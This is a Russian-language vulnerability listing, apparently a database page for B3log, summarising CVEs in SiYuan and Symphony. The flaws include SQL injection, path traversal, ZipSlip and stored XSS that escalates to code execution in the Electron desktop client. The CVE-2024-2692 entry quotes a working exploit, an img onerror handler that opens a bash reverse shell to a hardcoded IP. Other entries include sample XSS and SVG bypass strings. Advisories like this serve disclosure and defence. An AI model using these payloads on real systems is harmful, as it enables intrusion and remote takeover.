nvd,anchore_overrides
B3log
Уязвимости
79
Эксплуатируемые
0
Критический
17
Высокий
26
Топ уязвимостей
CVE-2026-32767SiYuan - это система управления личными знаниями. Версии 3.6.0 и ниже содержат уязвимость обхода авторизации в конечной точке /api/search/fullTextSearchBlock. Когда параметр метода установлен на 2, конечная точка пропускает пользовательский ввод непосредственно в качестве необработанного SQL-выписки в базовую базу данных SQLite без какой-либо авторизации или проверки только для чтения. Это позволяет любому аутентифицированному пользователю, в том числе с ролью Reader, выполнять произвольные SQL-высказывателей (SELECT, DELETE, UPDATE, DROP TABLE и т. Д.) В основе базы данных приложения. Это несовместимо с собственной моделью безопасности приложения: выделенная конечная точка SQL (/api/query/sql) правильно требует как промежуточного программного обеспечения CheckAdminRole, так и CheckReadonly, но конечная точка поиска полностью обходит эти элементы управления. Эта проблема исправлена в версии 3.6.1.
CVE-2026-30869SiYuan - это система управления личными знаниями. До 3.5.10 уязвимость прохождения пути в конечной точке/экспорт позволяет злоумышленнику считывать произвольные файлы из файловой системы сервера. Используя двухкодированные последовательности обхода, злоумышленник может получить доступ к конфиденциальным файлам, таким как conf/conf.json, которые содержат секреты, включая токен API, ключ для подписи файлов cookie и код аутентификации доступа к рабочему пространству. Утечка этих секретов может обеспечить административный доступ к API ядра SiYuan, и в определенных сценариях развертывания потенциально может быть прикован к удаленному исполнению кода (RCE). Эта уязвимость фиксируется в 3.5.10.
CVE-2024-53507В Siyuan 3.1.11 в /getHistoryItems обнаружена уязвимость SQL-инъекции.
CVE-2024-53506В Siyuan 3.1.11 выявлена уязвимость SQL-инъекции через параметр массива ids в /batchGetBlockAttrs.
CVE-2024-53505В Siyuan 3.1.11 выявлена уязвимость SQL-инъекции через параметр id в /getAssetContent.
CVE-2024-53504В Siyuan 3.1.11 выявлена уязвимость SQL-инъекции через параметр notebook в /searchHistory.
CVE-2024-23049Проблема в symphony v.3.6.3 и более ранних версиях позволяет удаленному злоумышленнику выполнить произвольный код через компонент log4j.
CVE-2018-10469b3log Symphony (aka Sym) 2.6.0 позволяет удаленным злоумышленникам загружать и выполнять произвольные JSP-файлы через параметр name[] в URI /upload.
CVE-2026-34449SiYuan - это система управления личными знаниями. До версии 3.6.2 вредоносный веб-сайт может достичь Удаленного Исполнения кода (RCE) на любом рабочем столе под управлением SiYuan, используя разрешительную политику CORS (Access-Control-Allow-Origin: * + Access-Control-Allow-Private-Network: true) для введения фрагмента JavaScript через API. Введенный фрагмент выполняет в контексте Node.js Electron с полным доступом к ОС в следующий раз, когда пользователь открывает пользовательский интерфейс SiYuan. Никакое взаимодействие пользователя не требуется, кроме посещения вредоносного веб-сайта, пока работает SiYuan. Эта проблема была исправлена в версии 3.6.2.
CVE-2026-44670SiYuan - это система управления личными знаниями с открытым исходным кодом. До 3.7,0, ядра хранит имена Attribute View (AV / база данных) без какого-либо HTML-побега, затем шаблон рендеринга использует необработанные строки.Заменить All(tpl, "${avName}", nodeAvName) для встраивания имени в HTML перед тем, как подтолкнуть всех клиентов через WebSocket. Три независимых пути клиента (render.ts:120 → over overHTML, Title.ts:401 → innerHTML, транзакция.ts:559 → innerHTML) потребляют значение без побега. Поскольку основной BrowserWindow работает nodeIntegration:true, contextIsolation:false, webSecurity:false (app/electron/main.js:407-411), HTML-инъекция в рендерер становится исполнением кода Node.js. Эта уязвимость фиксируется в 3.7.0.
CVE-2026-44588SiYuan - это система управления личными знаниями с открытым исходным кодом. До 3.7.0 мышиный обработчик инструментов в app/src/block/popover.ts читает арию-лейбл через getAttribute и пропускает его через decodeURIComponent, прежде чем назначить messageElement.innerHTML в app/src/dialog/tooltip.ts:41. Кодировщик, используемый на стороне производителя, escapeAriaLabel в app/src/util/escape.ts:19-25, обрабатывает только специальные символы HTML (", ', <, буквально <) - он оставляет %XX URL-побеги нетронутыми. Таким образом, заголовок doc, содержащий %3Cimg src=x onerror=...%3E туда-обратно через escapeAriaLabel и уровень атрибутов HTML, не модифицированный. Затем decodeURIComponent на стороне потребителя преобразует %3C в буквальный < символ (реальный <, НЕ ссылка на символ). Когда эта строка назначена in innerHTML, токенизатор HTML5 входит в TagOpenState на буквальном <, анализирует элемент <img> и обработчик ошибки увольняет. Поскольку рендеринг работает с nodeIntegration: true, contextIsolation: false, webSecurity: false (app/electron/main.js:407-411), noject('child_process') распространяется от впрыснутого обработчика, перестраиваясь до произвольного выполнения кода. Эта уязвимость зафиксирована в 3.7.0.
CVE-2026-32749SiYuan - это система управления личными знаниями. В версиях 3.6.0 и ниже POST /api/import/importSY и POST /api/import/importZipMd записывают загруженные архивы на путь, полученный из поля многочастного имени файла без санации, позволяя администратору записывать файлы в произвольные местоположения за пределами временного каталога, включая системные пути, которые позволяют RCE. Это может привести к разрушению, перезаписывая рабочие места или файлы приложений, а для контейнеров Docker, работающих как root (общий по умолчанию), это дает полный компрометацию контейнера. Эта проблема была исправлена в версии 3.6.1.
CVE-2026-45375SiYuan - это система управления личными знаниями с открытым исходным кодом. До 3.7.0 SiYuan's Bazaar (общественный рынок) отображает поля имени и версий плагина пакета (и эквивалентный тема.json / template.json / widget.json / icon.json / icon.json) в Настройки → Маркетплейс UI без выхода HTML. Помощник на стороне ядра дезинфицируетPackageDisplayStrings в ядре/bazaar/package.go HTML-escapes только Автор, ДисплейНами и Описание — Имя и Версия поступают в рендерер сырой. Фронтенд на app/src/config/bazaar.ts заменяет их в HTML-струны шаблонов через ${item.preferredName} / ${data.name} / v${data.version} и присваивает результат in innerHTML. Как следствие, вредоносный HTML в любом поле анализируется и выполняется, когда пользователь открывает вкладку маркетплейса. Эта уязвимость зафиксирована в 3.7.0.
CVE-2026-40322SiYuan - это система управления личными знаниями с открытым исходным кодом. В версиях 3.6.3 и ниже диаграммы Русалок отображаются с набором SecurityLevel в «свободный», а полученный SVG вводится в DOM через in innerHTML. Это позволяет управляемой злоумышленником javascript: URL-адреса в блоках кода Русалок выживать в рендерируемом выводе. На настольных сборках с использованием Electron окна создаются с включенной nodeIntegration и отключенной контекстной выделением, что перестраивает сохраненный XSS до произвольного выполнения кода, когда жертва открывает заметку, содержащую вредоносный блок Русалки, и нажимает на узл диаграммы. Эта проблема исправлена в версии 3.6.4.
CVE-2026-39846SiYuan - это персональный система управления знаниями. До 3.6.4 вредоносная заметка, синхронизированная с другим пользователем, может вызвать удаленное выполнение кода в клиенте рабочего стола SiYuan Electron. Основная причина заключается в том, что содержимое подписи к столу хранится без безопасного побега, а затем не убегает в визуализированный HTML, создавая сохраненную раковину XSS. Поскольку настольный рендерер работает с включенной nodeIntegration и отключенной контекстомIsolation, контролируемый злоумышленником JavaScript выполняется с доступом к API Node.js. На практике злоумышленник может импортировать созданную записку в синхронизированное рабочее пространство, ждать синхронизации жертвы и достигать выполнения кода, когда жертва открывает записку. Эта уязвимость зафиксирована в 3.6.4.
CVE-2026-34448SiYuan - это система управления личными знаниями. До версии 3.6.2 злоумышленник, который может разместить вредоносный URL в поле Attribute View mAsse, может спровоцировать сохраненный XSS, когда жертва открывает вид Галереи или Канбана с включенным «Полем активов с помощью поля» с включенным «Полем активов». Уязвимый код принимает произвольные URL-адреса http(s) без расширений в качестве изображений, хранит контролируемую злоумышленником строку в coverURL и вводит ее непосредственно в атрибут <img src=">>, не убегая. В настольном клиенте Electron вводимый JavaScript выполняется с включенной nodeIntegration и отключена контекстная и отключенная система, поэтому XSS достигает произвольного выполнения команд ОС под учетной записью жертвы. Эта проблема была исправлена в версии 3.6.2.
CVE-2024-2692Версия SiYuan 3.0.3 позволяет выполнять произвольные команды на сервере. Это возможно, поскольку приложение уязвимо к Server Side XSS [1]. Уязвимость позволяет злоумышленнику выполнить произвольный код на сервере, импортируя файл с вредоносным HTML-кодом. Пример эксплойта: <img src="1" onerror="require('child_process').exec('bash -i >& /dev/tcp/24.144.86.165/4444 0>&1');"/> [1]. На данный момент нет доступного патча для этой уязвимости.
Источники:
- [1] https://fluidattacks.com/advisories/dezco/
- [2] https://github.com/siyuan-note/siyuan/
CVE-2026-41421SiYuan - это система управления личными знаниями с открытым исходным кодом. До 3.6.5 рабочий стол SiYuan передает сообщения уведомлений как необработанный HTML внутри рендерера Electron. Маршрут уведомления POST /api/notification/pushMsg принимает контролируемое пользователем значение msg, пересылает его через бэкэнд-вещательный слой, а интерфейс вставляет его в DOM со вставкойAdjacentHTML(...) на message.ts. На настольных сборах это не ограничивается обычным XSS. Электронные окна создаются с помощью узловой Интеграции: true, contextIsolation: false, and webSecurity: falsed at main.js. В результате JavaScript, выполненный из поглотителя уведомлений, может напрямую получить доступ к API-интернату Node и перерасти в выполнение кода рабочего стола. Эта уязвимость исправлена в 3.6.5.
CVE-2025-67488SiYuan - это самостоятельный персональный сервис для управления знаниями с открытым исходным кодом. Версий 0.00-20251202123337-6ef83b42c7ce и ниже содержат функцию импортZipMd, которая уязвима для ZipSlips, что позволяет аутентифицированному пользователю перезаписывать файлы в системе. Аутентифицированный пользователь с доступом к функции импорта в примечаниях может перезаписать любой файл в системе и может при некоторых обстоятельствах перерасти в полное исполнение кода. Исправление запланировано для версии 3.5.0.
CVE-2026-40107SiYuan - это система управления личными знаниями. До 3.6.4 SiYuan настраивает Mermaid.js с уровнем безопасности: "свободный" и htmlLabels: true. В этом режиме <img> метки с атрибутами src выживают во внутреннем DOMPurify Руса и приземляются в блоках SVG <foreignObject>. SVG вводится через in innerHTML без вторичной дезинфицирующей дезинтеграции. Когда жертва открывает записку, содержащую вредоносную диаграмму Русалки, клиент Electron забирает URL. В Windows протокол-относительный URL (//attacker.com/image.png) решается как путь UNC (\\attacker.com\image.png). Windows автоматически пытается аутентифицировать SMB, отправляя хэш жертвы NTLMv2 злоумышленнику. Эта уязвимость фиксируется в 3.6.4.
CVE-2025-21609SiYuan — это размещенное самостоятельно программное обеспечение для управления личными знаниями с открытым исходным кодом. SiYuan Note версии 3.1.18 имеет уязвимость произвольного удаления файлов. Уязвимость существует в конечной точке `POST /api/history/getDocHistoryContent`. Злоумышленник может создать полезную нагрузку для использования этой уязвимости, что приведет к удалению произвольных файлов на сервере. Коммит d9887aeec1b27073bec66299a9a4181dc42969f3 устраняет эту уязвимость и, как ожидается, будет доступен в версии 3.1.19.
CVE-2024-55659До версии 3.1.16 конечная точка `/api/asset/upload` в Siyuan уязвима как для произвольной записи файлов на хост, так и для хранимого межсайтового скриптинга (через запись файлов). Версия 3.1.16 содержит исправление этой проблемы.
CVE-2024-55658SiYuan — это система управления личными знаниями. До версии 3.1.16 конечная точка /api/export/exportResources SiYuan уязвима для произвольного чтения файлов через обход пути. Можно манипулировать параметром paths для доступа и загрузки произвольных файлов из хост-системы путем обхода структуры каталогов рабочей области. Версия 3.1.16 содержит исправление этой проблемы.
CVE-2024-55657SiYuan — это система управления личными знаниями. До версии 3.1.16 в конечной точке `/api/template/render` SiYuan существует уязвимость произвольного чтения файлов. Отсутствие надлежащей проверки параметра пути позволяет злоумышленникам получать доступ к конфиденциальным файлам в хост-системе. Версия 3.1.16 содержит исправление этой проблемы.
CVE-2026-34605SiYuan - это система управления личными знаниями. От версии 3.6.0 до версии 3.6.2 функция SanitizeSVG, введенная в версии 3.6.0 для фиксации XSS в неаутентированной /api/icon/getDynamicicon, может быть обойдена с помощью имен, префиксированных именами элементов, таких как <x:script xmlns:x="http://www.w3.org/2000/svg">. Парсер Go HTML5 записывает тег элемента как «x:script», а не «script», поэтому проверка тега пропускает его. SVG подается с Content-Type: image/svg+xml и без политики безопасности контента; когда браузер открывает ответ напрямую, его XML-парсер разрешает префикс в пространство имен SVG и выполняет встроенный скрипт. Эта проблема была исправлена в версии 3.6.2.